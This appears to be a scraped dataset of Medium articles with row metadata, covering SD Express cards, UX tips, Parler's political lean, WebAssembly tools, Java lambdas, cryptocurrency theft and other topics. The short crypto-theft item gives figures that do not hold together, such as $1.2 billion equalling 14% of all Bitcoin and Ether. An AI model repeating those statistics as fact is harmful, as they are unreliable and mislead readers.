Buyer personas can help you to optimize your online marketing budget. When you understand your customers’ behavior, which tells you how your customers obtain information and which goals and motives they have, you can target your customers at the right time, with the right product. This results in an increase of online traffic and repeated purchases. Besides, a buyer persona help you make better decisions when it comes to promoting content and choosing appropriate marketing channels (Facebook, LinkedIn, Instagram etc).
In conclusion, buyer personas can help you understand your customers better. Buyer personas enable you to match your marketing content to your target group, which makes your marketing content more relevant to your (potential) customers. In addition, it can help you approach your customers through the right channels with the right content.
| https://medium.com/marketing-and-branding/buyer-personas-in-retail-619e8affa782 | ['Raul Tiru'] | 2020-12-21 12:10:00.398000+00:00 | ['Retail Marketing', 'Retail Technology', 'Buyer Personas', 'Retail', 'Retail Industry']
176 | The New SD Express Card Explained: Everything You Need to Know | After a period of two years, the SD Association — a consortium that sets memory card standards — announced specifications for the new SD Express card in its 8th release. The headline feature of the SD Express card is its ability to transfer data at 4GBps, which is really amazing. Apart from that, dual lanes have been incorporated in the SD Express card to deliver gigabyte speed. So if you are curious as to how the Association managed to increase the transfer speed fourfold then you have come to the right place. In this article, we take a detailed look at its version history, technical aspects, architecture design, and more. Further, I have discussed what this new memory card can bring to general consumers in the end. So without wasting any time, let’s go through the article.

1. The Basics

If you are unfamiliar with the various standards of SD cards then let’s brush up on the basics first. SD cards have multiple bus interfaces. By bus interface, I mean the design of the connectors that establish a connection with the peripheral device. The names of the bus interfaces are based on their speed capability. For instance, the first bus interface was literally called “Default Speed” which could read and write at 12.5 MB/s. The next release was called “High Speed” which peaked at 25 MB/s. After that, UHS (Ultra High Speed) became the standardized bus interface for several years following the release of UHS-I, II, and III. The latest UHS-III supports transfer speed up to 624 MB/s.

Source: Wikipedia

In 2018, the SD Association overhauled its bus interface and brought a new standard called “Express”. On SD Express cards, the transfer speed could go up to 985 MB/s (around 1GBps), but that was not its standout feature. For the first time, the SD Association used the PCIe interface and NVMe protocol to create a new bus interface for its SD card.
By the way, PCIe and NVMe are used in SSDs and we know how fast they can be (up to 5GBps). So the release of the first SD Express card in 2018 marked a new chapter in the SD Association’s history. Fast forward to the present, and now the Association has announced that their new SD Express card can go up to 4GBps (3938 MB/s, to be specific), again thanks to an improved PCIe interface and NVMe protocol.

The New SD Express Card

So to sum up, SD cards have finally entered the Gigabit race and it would be interesting to see how this changes the market dynamic for consumer device makers. But before that, let’s go ahead and study how the new SD Express card leveraged the PCIe and NVMe technologies to nearly quadruple the transfer speed from its last-gen bus interface.

2. PCIe Interface and NVMe Protocol

During the first SD Express card release, the consortium had implemented the older PCIe 3.1 interface and NVMe 1.3 protocol. But now, they are using the well-known PCIe 4.0 interface and the latest NVMe 1.5 protocol. Sure, PCIe 4.0 is not the latest interface, but it’s one of the most widely adopted bus interfaces among electronics makers. Apart from that, PCIe 4.0 maintains backward compatibility and interoperability with all the older PCIe generations, so that is great. Another reason why the new SD Express card has seen such a massive uptick in transfer speed is its dual-lane architecture. I have discussed the architecture of the SD Express card in detail below, so let’s go through that.

3. The Architecture of the New SD Express Card

Before we dive deep into its architecture, keep in mind that the SD Association has not announced a microSD card with the PCIe 4.0 + NVMe tech. For now, it’s only limited to the full-sized SD memory card. With that out of the way, let’s move to the architecture. The new SD Express card has three configurations:
A single-lane PCIe 4.0 interface which can go up to 2GBps (4.0 x 1)
A dual-lane PCIe 3.1 interface which can go up to 2GBps (3.1 x 2)
A dual-lane PCIe 4.0 interface which can go up to 4GBps (4.0 x 2)
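As a rough sanity check on those figures, here is a tiny sketch in JavaScript; the per-lane numbers (about 1 GB/s for PCIe 3.1 and about 2 GB/s for PCIe 4.0) are assumptions inferred from the three configurations above, not official figures:

```javascript
// Approximate usable bandwidth per lane, in GB/s (assumed from the list above)
const perLaneGBps = { 'pcie3.1': 1, 'pcie4.0': 2 };

// Total theoretical throughput = per-lane bandwidth * number of lanes
function throughput(gen, lanes) {
  return perLaneGBps[gen] * lanes;
}

console.log(throughput('pcie4.0', 1)); // 2 — single-lane PCIe 4.0
console.log(throughput('pcie3.1', 2)); // 2 — dual-lane PCIe 3.1
console.log(throughput('pcie4.0', 2)); // 4 — dual-lane PCIe 4.0
```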
In Figure 3 below, you can see that it uses the same pins and connectors as the older UHS-II interface. However, the differential interface is based on PCIe 4.0 and features a single lane. As mentioned above, it can go up to 2GBps.

Moving to Figure 4, this is where things get interesting. As you can see, there is an additional third row of pins to support two PCIe lanes. It can be used for implementing both PCIe 3.1 and 4.0 interfaces. Apart from that, for dual-lane cards, an additional pin 19 has been added for providing more power (3.3V). Moreover, Pin 18 has been reserved for an optional 1.2V supply planned for future use.

The best part about the new SD Express card architecture is that the first row is based on the UHS-I interface. It means that, despite being a modern and extremely fast memory card, SD Express will still be backward compatible with billions of existing SD host devices. You will be able to plug in the SD Express card and use it on older laptops and card readers without having to buy a compatible SD card reader. However, keep in mind, you won’t get the touted Gigabit transfer speed.

4. What Does It Mean to General Consumers?

The new SD Express card is a big leap in the removable storage segment. It can be a game-changer for creative professionals who shoot high-resolution content such as super-slow-motion video, RAW continuous burst mode photography, 8K video, 360-degree video, and more. In fact, the SD Association has said that “this new protocol allows SD Express memory cards to serve as removable Solid State Drives (SSD)”. From the technical point of view, the SD Express card has really become an SSD at this point. However, we will have to wait and see how consumer device makers react to this new development. The Association has also pinned its hopes on Android device makers, indicating that SD Express cards can now be used as embedded memory in place of eMMC or UFS storage.
However, the big issue with SD cards, in general, is that they consume too much power in comparison to UFS or eMMC. Traditionally, SD cards need 3.3V to initialize the card and 1.8V to perform operations. In contrast, UFS needs 0.2V to 0.4V to initialize and perform operations. On top of that, the new SD Express card comes with additional pins for power supply so it’s unlikely that SD cards are going to replace eMMC or UFS in smartphones. Having said that, it would be awesome, if laptops would bring back the SD card slot — not just for plugging removable memory card, but to extend the storage. It would be the best solution and reduce the hassle of replacing the SSD by opening the innards of a laptop. Moreover, the new SD Express card supports storage up to 128TB (theoretical, I know!) so you would get ample capacity in a small footprint with stellar read-write speed. To sum up, the new SD Express card can be a great replacement for PCIe-NVMe SSDs. Now coming to the crucial question — when can you get your hands on the ultra-fast memory card? Well, it could take more than a year for memory card makers to implement the latest specifications, so late 2021 would be a safe bet. However, since there are so many versions and standards of memory cards, it can be confusing for a user to pick the right SD Express card. The SD Association has released the trademark for the SD Express card and it would appear similar to the above image on the memory card. As it supports all three SD card families, you can pick anyone from SDHC, SDXC, SDUC. SDHC cards are available under 32GB and will have transfer speed around 2GBps. Next, SDXC cards can have storage up to 2TB and can go up to 2GBps. Finally, SDUC cards will offer you maximum storage of up to 128TB and transfer speed of up to 4GBps. Keep in mind, all these numbers are theoretical so the transfer speed can significantly change depending on the host device. 
You can find transfer speeds for various card-host combinations from the below image.

Learn About the New SD Express Card

So that was all about the SD Express card. We have discussed a bit of history, its technical aspects, architecture, and some pointers for general users to pick the right memory card. The card is broadly targeted at creative and professional users, but I think it would be a great solution for people who want to extend the storage on their computers in a hassle-free manner. Anyway, that is all from us. If you want to learn more about this subject then you can go through the whitepaper published by the SD Association. And if you found the article informative then you can comment down below and let us know.
The Blog Credit Goes To Bb | https://medium.com/@cr0tk/the-new-sd-express-card-explained-everything-you-need-to-know-6075d22751b4 | ['Divyansh Singh'] | 2020-12-02 05:20:43.877000+00:00 | ['Sd Card', 'Mac', 'Tech', 'Technology', 'Windows'] |
177 | I found the Best Raspberry Pi course that helps you in 2021 | Raspberry Pi course for Beginners.
Raspberry Pi is the name of a series of single-board computers made by Raspberry Pi Foundation, a UK charity that aims to educate people in computing and create easier access to computing education
All over the world, people use Raspberry Pis to learn programming skills, build hardware projects, do home automation, and even use them in industrial applications, so this course helps you learn to use the Raspberry Pi computer.
Why should you take a Raspberry Pi course?
You will use the Raspberry Pi to design and develop fun and practical IoT devices while learning programming and computer hardware. In addition, you will learn how to set up the Raspberry Pi environment, get a system running on Mac or PC, write and execute some basic Python code on the Raspberry Pi, and trace and debug Python code on the device.
TAP HERE TO KNOW MORE ….. | https://medium.com/@jyotrymayanandasahu/i-found-the-best-raspberry-pi-course-that-helps-you-in-2021-63b3eb5aff22 | [] | 2020-12-27 14:00:23.129000+00:00 | ['2021 Trends', 'Computers', 'Technology', 'Raspberry Pi', '2021'] |
178 | Top UI UX Design Inspiration 135 | 9 tips from TheyMakeDesign editors
1. Use role-play
A bit of role-play can create the space for inspiration. Take a step away from your projects, and pretend you are a user. Think about what would make you excited and pleased to use a website or an application. Think about the frustrations you have experienced. Think about what appeals and why others are skeptical or afraid. Think about the memes you have seen that relate to a potential design. Once you have teased the ideas out, you can look at them. See if some ideas from different perspectives add more value. You can either take one idea and do more research on it or come up with a few different ideas to take to your next meeting.
2. Look at the bigger picture
Let’s say you are designing an add-on for an existing product. It is a small application that functions in one place. You are designing an additional button on the sidebar called “extended features” that will add a sub-menu to that page. You are thinking about the UX for this button, but you worry that it will get buried beneath other links and menus. Wanting to get focus on this feature, you meet with the product owner, who is excited about the extended features button you are designing. It still gets buried in menus.
3. Embrace the uncertainty
Being uncertain is the natural state of design. Tony Faulds (design guru) has a great way of defining this.
Our job as UX designers is to embrace uncertainty, much as the river embraces the landscape. We should always know where we are heading and the purpose of the journey, but we should maintain flexibility.
Even though you have a plan for your project, you are going to have to let go at a few points, like when there is disagreement or when you are in the middle of something that doesn’t quite fit. If you can get your mindset working towards uncertainty, you will be able to have greater impact in your designs.
4. User and stakeholder interviews
If you feel stuck in your design process, a discussion with potential users and stakeholders can provide valuable insights and direction. Take the time to ask the appropriate questions and you will be better able to understand the vision for the project and the goals and expectations for new features. As a result, the points in the next tip will be clearer and more useful.
5. Have a concept to develop from the beginning
When you’re ready to develop some designs, take a few extra moments to help define the vision, goals and expectations for the project. As a result of doing this, the points in #4 will be clearer and more useful.
6. Think about the users
Users drive the design process. As Edward De Bono says, you need to “think about the person who will be using this. . . and design a solution from their point of view.”
7. Consider the purpose of the site or application
The first step in designing is to think about what the finished product will look and feel like. As an example, think about your favorite site or application and then ask yourself what you got out of your last visit. (diagonally measure your project scope with user’s actions)
8. Know the constraints
There are some constraints your design process can experience. The technology you are working with, designers available, and the scope the rest of the stakeholders have all affect the design. Before you start designing, ask these 3 questions “What constraints are we working with?” “What are we not constrained by?” “What could we add to the process that would be beneficial?”
9. Define your approach
When you are ready to take an approach to designing you want to do, think about the core assumptions you want to make.
Conclusion thoughts
Sometimes, it’s good to take a step back to clarify the thoughts in our head.
I hope these 9 tips help you develop a better process for designing. If you have any tips of your own that you would like to share I would love to hear from you! Please email them to me at [email protected]. | https://uxplanet.org/top-ui-ux-design-inspiration-135-eedca154088a | ['They Make Design'] | 2020-12-22 07:41:48.731000+00:00 | ['Visual Design', 'Design', 'Inspiration', 'Technology', 'Art'] |
179 | Is Parler Right Biased? | Is Parler Right Biased?
First, I’m going to disclose that I’m pretty biased here. I’m a former Facebook engineer (2 years on main FB News Feed iOS product) and I’ve been a software engineer for over a decade. I live in Silicon Valley and voted for Joe Biden.
That being said, I try to look at ground truth. While I use Facebook and vote Democrat, I have major public complaints and feedback about each, and I think it is healthy to recognize what you prefer as well as what is actually going on. I do love to download any new mobile iOS app to see what it is about and to grab my user name while the product is still in beta whenever possible. So when I saw that some of my Republican family and friends were asking on Facebook for us to “switch” to Parler, a website and mobile app that, in its own meta:description (Google summary) tag, claims:
“Parler is an unbiased social media focused on real user experiences and engagement. Free expression without violence and no censorship. Parler never shares your personal data.”
Then I thought, better grab my user name, and downloaded and installed the app. The very first screen?
Oooh, is this for picking my complementary hat?
Ignoring that adding a feature to theme your social media app before you have copy and paste is just bad development and sets the general quality bar for the product fairly low (we aren’t here for that), and while I may think making red the default color theme is tacky, it’s just a subliminal sign of the super-liminal hints that come when it’s time to “Personalize your Parler Experience”:
*Assuming your person is a MAGA republican
In case you can’t tell what these individuals have in common: it’s Donald Trump. Two of them are sitting US politicians, and the rest are pundits. All are vocal Trump cultists. If you choose to “Skip” adding Hannity as one of your friends, you are taken to a second screen asking you again to “Personalize your Parler Experience”:
Look Familiar
Again, ignoring how confusing it is to have two identical steps (it kind of looks like the second one is their equivalent of “Pages” vs. “Individuals”, though the distinction is unclear), and that they already suggested I follow Hannity, all of the suggestions are pro-Trump far-right groups. The only question mark I had was “Transparency 2020”, which is unrelated to any real organization that I could find, only reposts claims that the 2020 election was rigged, and “transparently” describes itself only as “Unfiltered Content”.
So every page suggested during the setup process is Pro-Trump, and Far Right. If this is a mere coincidence of circumstance, it doesn’t start off on a good foot, and as a software developer, it occurred to me that the answers to the first 3 questions on this screen could very easily be used as a purity test, to spot and assist in banning users (We can get to that later). So far not seeing a lot of the “unbiased” claimed in the tagline. But let’s give it a shot. When you first join, you automatically make your first post:
Putting words in your mouth is the opposite of censorship!
Seconds after my “Hello Parler” Post, I had my first user interaction!
Wait, THE Ron Paul
I’m not sure if these automatic posts are a part of the Parler system, or just take advantage of the fact that it currently has a really bad bot problem. In case you are thinking that an auto welcome post from Ron Paul means there is a non-Trumper on the system, he changed his position on Trump a while ago. Batting 100 still. So yes, while all the content and content producers so far seem to be MAGA Trumpers and right-wing “news” outlets, that doesn’t mean that the platform is biased. Just everything on it, right? The answer comes when you go to the other tabs available in the app: “Discover” news, and search. The Discover news tab has two feeds, “Partners” and “Affiliates”. I scrolled and checked bias for a while, but all of the featured partners and affiliates were right-leaning. As for the content (which I could only find through the search hashtags function, a limited and kind of broken way to see “Trending Content”, I suppose), it was all either extreme-right posts or “sexy time” spam bots targeting evangelicals.
Alllllright. Sexy Time. Real Lady. High five.
So, the lion’s share of the current contributors, affiliates, partners, and non-spam content is right-wing.
Does that make the Platform Right Biased? For all practical purposes it does.
The CEO has acknowledged their membership problem, and has claimed to put up a 20k bounty for “an openly liberal pundit with 50,000 followers on Twitter or Facebook to start a Parler account.”, they had it at 10k but had to raise it up when nobody took the bait.
So maybe, the day will come when the wash of 2020 Trump mourners looking for a news feed that kept feeding them the reality they want to believe without all those pesky fact checkers, subsides. And maybe a few brave liberal influencers will come to the platform seeking to stand against the red hordes. And maybe a slow trickle of left leaning regular users and lurkers will come to follow that content rather than where those contributors normally post. And just maybe then everyone else will come in, and the content and contributors will find the same natural balance that Facebook and Twitter has in terms of left and right voices.
But personally I don’t think there will ever be anything close to the user and content base parity found on other sites, and If I’ve learned anything about what makes a social media site successful it’s having as many people on it as possible. And whether intentionally or sheer coincidence Parler has gotten off to a really bad start alienating half of its potential user base. Nobody is going to want to go somewhere to get bullied. Better to burn the brand and try again, with a rallying cry that is less one sided, or just admit to being a right biased safe space. | https://medium.com/swlh/is-parler-right-biased-ccf3c16ce0ca | [] | 2020-11-13 21:55:22.665000+00:00 | ['Parler', 'Politics', 'Bias', 'Social Media', 'Technology'] |
180 | Developing Expertise | 1. Principles
To begin, develop a wide and thorough vocabulary. This enables a person to understand the core elements in a field, but more importantly: communicate with people about the field. This vocabulary in our memory helps us recognize elements at a fundamental level and later conceptually map how these elements relate to one another. These fundamental truths about a field are called principles.
This way of thinking is known as First Principles, which Aristotle said: | https://medium.com/compound-community/developing-expertise-5c36897e4963 | ['Joshua Hoering'] | 2020-12-24 05:29:39.365000+00:00 | ['Consulting', 'Learning', 'Innovation', 'Business', 'Technology'] |
181 | 12 hot language projects riding WebAssembly | Image Credit: Bamyx Technologies
Today’s web applications aren’t even close to being as quick and responsive as native desktop apps, but what if they could be? That is the promise of WebAssembly.
WebAssembly is a low-level, assembly-like language with a compact binary format that runs in web browsers at near-native speed. At the same time, WebAssembly provides a portable compilation target for programming languages such as C/C++, C#, Rust, Go, Kotlin, Swift, and others.
WebAssembly is supported by Google, Mozilla, Apple, and Microsoft in their browser engines, and is hailed as a means to increase online application speed while also allowing languages other than JavaScript to be utilized in the development of browser programs.
WebAssembly has spawned a slew of new technologies, including even new programming languages, that make use of its capabilities. The following are 12 language initiatives that have staked a significant amount of money on WebAssembly.
Binaryen
Binaryen is a compiler and toolchain infrastructure library for WebAssembly. Written in C++, Binaryen aims to make compiling to WebAssembly simple, effective, and fast.
Blazor WebAssembly
Blazor WebAssembly is a framework for creating interactive, client-side, single-page web apps in .NET and hosting them in modern browsers (including mobile browsers) using the WebAssembly runtime. There are no plug-ins or code recompilation into other languages necessary. The runtime allows .NET code to use WebAssembly’s JavaScript APIs to access browser functionality.
When a Blazor WebAssembly program is executed in the browser, C# code and Razor files are compiled into .NET assemblies, which are downloaded along with the .NET runtime to the browser. The .NET code is further protected against malicious operations on the client system since it is run in WebAssembly in the browser’s JavaScript sandbox. Blazor WebAssembly apps can be run on their own or with server-side assistance.
Cheerp
Cheerp is a web-based enterprise-grade C/C++ compiler from Leaning Technologies that compiles C and C++ up to C++ 17 into WebAssembly, JavaScript, or a combination of the two. Cheerp is built on top of the LLVM/Clang framework, with specific optimizations aimed at improving efficiency and reducing the size of the compiled output. Cheerp is mostly used to convert existing C/C++ libraries and applications to HTML5, but it may also be used to create web apps and WebAssembly components. Cheerp is available in both open source and commercial versions.
Cheerp is available for download at leaningtech.com.
CheerpJ
This LLVM-based compiler, dubbed “the Java compiler for the web,” turns any Java client program into WebAssembly, JavaScript, and HTML, allowing them to operate in modern browsers. To access the DOM from Java, CheerpJ uses three components: an AOT (ahead-of-time) compiler, a runtime in WebAssembly and JavaScript, and JavaScript DOM interoperability APIs. The AOT compiler can be used to compile JAR archives with CheerpJ. CheerpJ does not necessitate any server-side assistance.
CheerpJ, like Cheerp, is a product of Leaning Technologies. It’s available for download at leaningtech.com.
Emscripten
This open source compiler toolchain converts C and C++, as well as any other language that uses LLVM compiler technology, to WebAssembly for web deployment, Node.js, or a Wasm runtime like Wasmer. (The Emscripten compiler, emcc, also produces JavaScript, which gives the built programs API support.)
Emscripten was used to convert a number of real-world codebases to WebAssembly, including commercial codebases like the Unreal Engine 4 game engine and the Unity 3D platform. C and C++ standard libraries, C++ exceptions, and OpenGL/WebGL graphics commands are all supported by Emscripten. The Emscripten SDK may be used on Linux, MacOS, and Windows to install the Emscripten toolchain (emcc, LLVM, and so on).
Forest
Forest is a WebAssembly-compiling functional programming language. Forest’s purpose, according to developer Nick Johnstone, is to provide a language that makes it easier to create big, interactive, and functioning online programs without the conventional overhead of that approach.
Forest has static typing, pattern matching, immutable data structures, numerous syntaxes, and automatic code formatting, and is currently defined as “pre-alpha, experimental, conceptual research software.” Elm and Haskell inspired the first syntax in development.
The Forest language’s design principles include ease of cooperation, as painless testing as possible, and agreement on structure and semantics while agreeing to differ on syntax. Forest is designed to be quick enough for constructing sophisticated games while also being “blazing fast” for conventional web apps, according to Johnstone.
Forest is available for download on GitHub.
Grain
The Grain language combines aspects from academic and functional languages to create a language for the twenty-first century, the project website states. Grain can run in the browser, on the server, and potentially anywhere because it is compiled to WebAssembly using the Binaryen toolchain and compiler infrastructure. There are no runtime type errors, and no type annotations are required. The Grain toolchain is a single binary that includes a CLI, compiler, runtime, and standard library. To build Grain from source, developers will need Node.js and Yarn, and binaries are available for Linux, MacOS, and Windows.
You can find instructions for getting started with Grain at grain-lang.org.
JWebAssembly
JWebAssembly is a Java bytecode to WebAssembly compiler by I-Net Software that accepts Java class files as input and outputs WebAssembly binary format (.wasm file) or text format (.wat file).
The goal is to run Java natively in the browser via WebAssembly. JWebAssembly can theoretically compile any language that compiles to Java bytecode, including Clojure, Groovy, JRuby, Kotlin, and Scala.
JWebAssembly is not yet ready for production use. Although all of the requirements for the JWebAssembly 1.0 release have been met, testing still has to be completed. A Java bytecode parser, a test framework, and a Gradle plug-in are all in the plan for version 1.0. JWebAssembly 1.0 is expected to be released this year by I-Net Software.
JWebAssembly is available for download on GitHub.
Pyodide
Pyodide, which was recently spun out from Mozilla, compiles Python and the Python scientific stack to WebAssembly, bringing the Python 3.8 runtime, NumPy, SciPy, Matplotlib, Scikit-learn, and dozens of other packages to the browser. Pyodide allows Python to access web APIs and provides transparent object conversion between JavaScript and Python. Pyodide was launched in 2018 as part of the Iodide data-science-in-a-browser effort, and it can be tried out in a browser-based REPL.
Instructions for obtaining and using Pyodide can be found at pyodide.org.
TeaVM
TeaVM is a Java bytecode compiler that generates WebAssembly and JavaScript, allowing Java programs to run in the browser. Note, however, that WebAssembly support is currently in beta. TeaVM, like its cousin GWT (Google Web Toolkit), allows programmers to write Java applications and deploy them as JavaScript. Unlike GWT, TeaVM works with compiled class files rather than source code. In addition to Java, TeaVM also builds Kotlin and Scala code using existing compilers like javac, kotlinc, and scalac. TeaVM is primarily a web development tool; it is not intended for converting big Java or Kotlin codebases to JavaScript. Flavour, a TeaVM subproject, is a framework for creating single-page web apps.
On GitHub, you’ll find instructions for downloading and using TeaVM.
Uno Platform
Uno Platform is a UI platform for .NET teams to build single-codebase applications for WebAssembly, the web, Windows, MacOS, Linux, iOS, and Android using C# and XAML, as an alternative to the Xamarin mobile app platform. Uno uses the .NET 5 Mono-WASM runtime to run C# code in all major web browsers, and it also acts as a bridge for WinUI and UWP (Universal Windows Platform) apps to run natively on WebAssembly. Developers can use Visual Studio or Visual Studio Code to create web apps with Uno.
The Uno Platform website has instructions for getting started.
Wasmcloud
Wasmcloud is a Cosmonic application runtime that uses WebAssembly to create composable, portable apps that can be used in multi-cloud, edge, and browser environments. Security is handled by a WebAssembly sandbox, and an actor model separates business logic from specific underlying capabilities, according to the company. Developers can create microservices once in their preferred language and then deploy them anywhere. Rust, TinyGo, and AssemblyScript are among the languages currently supported. Wasmcloud has been accepted as a Sandbox project by the Cloud Native Computing Foundation (CNCF).
wasmCloud installation instructions can be found at wasmcloud.dev.
Don’t forget to give us your LIKES today | https://medium.com/@bamyxtechnology/12-hot-language-projects-riding-webassembly-c3969f06cca3 | ['Bamyx Technologies'] | 2021-08-27 18:00:56.621000+00:00 | ['Technology News', 'Language', 'Coding', 'Programming', 'Language Learning'] |
182 | Legible Lambdas | Photo by Math on Unsplash
We all love lambdas, don’t we? Lambdas are powerful (passing methods around, getting rid of anonymous classes…you get the picture) and with great power comes great responsibility. When we switched to using Java 8 at work, I was excited about finally getting to use lambdas! But very quickly, I found myself cramming all my code into a lambda. I was not only trying to overuse it, I was also writing code that was very unreadable.
Over the course of the past couple of years, I have gathered some “wows” and “gotchas” with using lambdas that I have run into AND, more importantly, run away from (all examples pertain mainly to Java):
Using Consumers, Functions, and Suppliers
Consumers are like methods with a void return type and one input argument. Functions are processing methods that take an element of type A and produce an element of type B (A and B could also be the same type).
Suppliers are comparable to methods that take no input arguments but always produce an output. It took me a while to get the hang of these nuances. Understanding these differences helps a bunch when you have to refactor code using one of these interfaces.
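Here is a minimal sketch of the three interfaces side by side (the class and variable names are my own, purely illustrative):

```java
import java.util.function.Consumer;
import java.util.function.Function;
import java.util.function.Supplier;

public class FunctionalInterfacesDemo {
    // Consumer: one input argument, no return value (like a void method)
    static Consumer<String> printer = s -> System.out.println("Hello, " + s);

    // Function: transforms an input of type A into an output of type B
    static Function<String, Integer> length = s -> s.length();

    // Supplier: no input arguments, always produces an output
    static Supplier<String> greeting = () -> "world";

    public static void main(String[] args) {
        printer.accept(greeting.get());          // prints "Hello, world"
        System.out.println(length.apply("abc")); // prints 3
    }
}
```

Notice how each interface maps onto a familiar method shape; that mental model is what makes the refactors below feel natural.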
For example, consider the following snippet of code:
someList.stream().map(listItem -> {
    Step 1;
    return result of Step 1;
}).map(step1Item -> {
    Step 2;
    return result of Step 2;
});

someOtherList.stream().map(listItem -> {
    Step 1;
    return result of Step 1;
}).map(step1Item -> {
    Step 3;
    return result of Step 3;
});
In order to be able to reuse applying Step 1 to listItems, we could extract the input to the first map method into a Function interface and with that change, the code would now look as follows:
someList.stream().map(applyStep1())
    .map(step1Item -> {
        Step 2;
        return result of Step 2;
    });

someOtherList.stream().map(applyStep1())
    .map(step1Item -> {
        Step 3;
        return result of Step 3;
    });

Function<A, B> applyStep1() {
    return a -> {
        Step 1;
        return result of Step 1;
    };
}
An easy way to do this: let your IDE help you extract the inputs to maps into Functions (select the entire block of code inside the map -> right-click and refactor -> Extract -> Method -> name the Function, and TADA). This can also be done for other interfaces like Consumers and Suppliers!
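To make the refactor concrete, here is a small, self-contained version in which “Step 1” is trimming whitespace, “Step 2” is upper-casing, and “Step 3” takes the first character. The class and method names are my own illustrative choices, not from the original pseudocode:

```java
import java.util.List;
import java.util.function.Function;
import java.util.stream.Collectors;

public class ExtractedStepDemo {
    // "Step 1", extracted once into a Function and reused by both pipelines
    static Function<String, String> applyStep1() {
        return item -> item.trim();
    }

    // First pipeline: Step 1 followed by "Step 2" (upper-casing)
    static List<String> upperCased(List<String> items) {
        return items.stream()
                .map(applyStep1())
                .map(String::toUpperCase)
                .collect(Collectors.toList());
    }

    // Second pipeline: Step 1 followed by "Step 3" (first character)
    static List<String> firstChars(List<String> items) {
        return items.stream()
                .map(applyStep1())
                .map(s -> s.substring(0, 1))
                .collect(Collectors.toList());
    }

    public static void main(String[] args) {
        List<String> input = List.of("  foo ", " bar");
        System.out.println(upperCased(input)); // [FOO, BAR]
        System.out.println(firstChars(input)); // [f, b]
    }
}
```

Because Step 1 lives in one place, changing it (say, also lower-casing) updates both pipelines at once.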
Reusing reduction methods
Want to get the sum of all the items in a list? The average? Look no further, the streams API has a method for both!
integerList.stream().mapToInt(Integer::intValue).sum()
integerList.stream().mapToInt(Integer::intValue).average()
The point I am trying to make here is that there are reduction methods provided out of the box, and it is a good idea to always look before venturing out to write your own :)
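For completeness, here is a runnable version of the two reductions above. Note that average() returns an OptionalDouble, since the stream may be empty; the helper names are my own:

```java
import java.util.List;

public class ReductionDemo {
    // Built-in reduction: sum of all items
    static int sum(List<Integer> integerList) {
        return integerList.stream().mapToInt(Integer::intValue).sum();
    }

    // Built-in reduction: average() returns OptionalDouble, so we
    // supply a fallback for the empty-list case
    static double average(List<Integer> integerList) {
        return integerList.stream()
                .mapToInt(Integer::intValue)
                .average()
                .orElse(0.0);
    }

    public static void main(String[] args) {
        List<Integer> numbers = List.of(2, 4, 6);
        System.out.println(sum(numbers));     // 12
        System.out.println(average(numbers)); // 4.0
    }
}
```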
Everything does not have to use the streams/parallel streams API
The streams API was one of the most widely celebrated features of Java 8, and rightly so. It plays very well with lambdas, and as someone new to this, I was subconsciously converting ALL my collections to streams irrespective of whether or not it was required.
Similarly streams vs parallel streams. The parallel is good right? Yes. Is it good ALL the time? ABSOLUTELY NOT. The internet is full of articles and performance benchmarks on these topics and I would highly recommend doing your research before streaming through EVERYTHING in your code base.
Break up the giant lambdas!
Say we are required to apply forty-four steps to our input and we decide to use a map. But are we required to apply all forty-four steps in a single map method? Well, let's see. If we were to use only one map method, this is what our code would look like:
someList.stream().map(listItem -> {
Step 1;
Step 2;
Step 3;
Step 4;
.
.
.
Step 44;
return result of all above Steps;
});
Next consider this:
someList.stream().map(listItem -> {
Step 1;
return result of Step 1;
}).map(step1Item -> {
Step 2;
return result of Step 2;
}).map(step2Item -> {
Step 3;
return result of Step 3;
}).map(step3Item -> {
Step 4;
return result of Step 4;
});
.
.
.
I believe one of the biggest advantages of using lambdas is how elegantly you can break up processing steps into their own map method (there are other methods one could use and I am just citing map as an example here). I always like to break up big map methods into individual ones that are more readable and maintainable (this also allows for reusability).
At the same time, I would recommend against blindly having only one line of execution within every map method. We could always combine processing steps into a map as seen fit (For example, Steps 1–3 could be inside a single map).
map() with an if loop vs a filter
You can filter items in a collection using filter(). How long was it before I moved ifs inside my maps to actually be filter predicates? Long enough. What I am saying is this:
someList.stream().map(listItem -> {
    if (listItem.startsWith("A")) {
        //Do Something
    }
});
Can be instead written as this:
someList.stream()
.filter(listItem -> listItem.startsWith("A"))
.map(listItem -> {
//Do Something
});
Though this may or may not necessarily provide a performance bump, it adds to readability and ensures the use of appropriate methods.
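Here is a minimal runnable version of the filter-based pipeline above; the names and the toUpperCase step are illustrative assumptions, not from the original snippet:

```java
import java.util.List;
import java.util.stream.Collectors;

public class FilterDemo {
    static List<String> namesStartingWithA(List<String> names) {
        return names.stream()
                .filter(name -> name.startsWith("A")) // filter instead of an if inside map
                .map(String::toUpperCase)             // "Do Something" with the survivors
                .collect(Collectors.toList());
    }

    public static void main(String[] args) {
        System.out.println(namesStartingWithA(List.of("Ann", "Bob", "Ada"))); // [ANN, ADA]
    }
}
```

With the predicate pulled into filter, the map stage only ever sees elements it should actually transform, which keeps each stage single-purpose.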
Switching to using lambdas was a big jump for me that took a long time to get used to and it continues to surprise, frustrate, and wow me ALL at the same time! | https://medium.com/javarevisited/legible-lambdas-4259c831918e | ['Janani Subbiah'] | 2020-11-22 09:58:37.316000+00:00 | ['Technology', 'Programming', 'Software Development', 'Java', 'Coding'] |
183 | Hackers stole 14% of the total volume of Bitcoins and “Ethereum” | Hackers stole 14% of the total volume of Bitcoins and “Ethereum”
Over the entire history of cryptocurrencies, hackers have managed to steal Bitcoins and Ethereum tokens worth $1.2 billion, or about 14% of all coins in existence today, Autonomous Research reported.
Lex Sokolin, director for financial strategy at Autonomous Research, noted that cryptocurrency theft “turned into an industry with a profit of about $200 million per year.”
According to WinterGreen Research, hacker attacks on cryptocurrencies have cost companies and governments $11.3 billion in lost taxes and commissions from legal transactions.
Meanwhile, against the background of new attempts by hackers, the market for software, services and hardware solutions to protect Blockchains could grow from $ 259 million in 2017 to $ 355 billion in the future. | https://medium.com/ico-crypto-news/hackers-stole-14-of-the-total-volume-of-bitcoins-and-ethereum-45b357c33bcf | ['Ico', 'Crypto News'] | 2018-01-22 23:31:08.747000+00:00 | ['Ethereum', 'Token', 'Technology', 'Hacker', 'Bitcoin'] |
184 | The story of one mother & two sons: value type vs reference type in Swift | Swift is a mother🤰and it has two sons 👬-
Value Type 🚴🏻♀️
Reference Type 🚴♂️
But what are their characteristics?🤼♂️
Do they behave the same or opposite to each other? 🧘♂️
Swift is a multi-paradigm programming language developed by Apple for iOS, macOS, watchOS, tvOS, Linux, and z/OS.💪
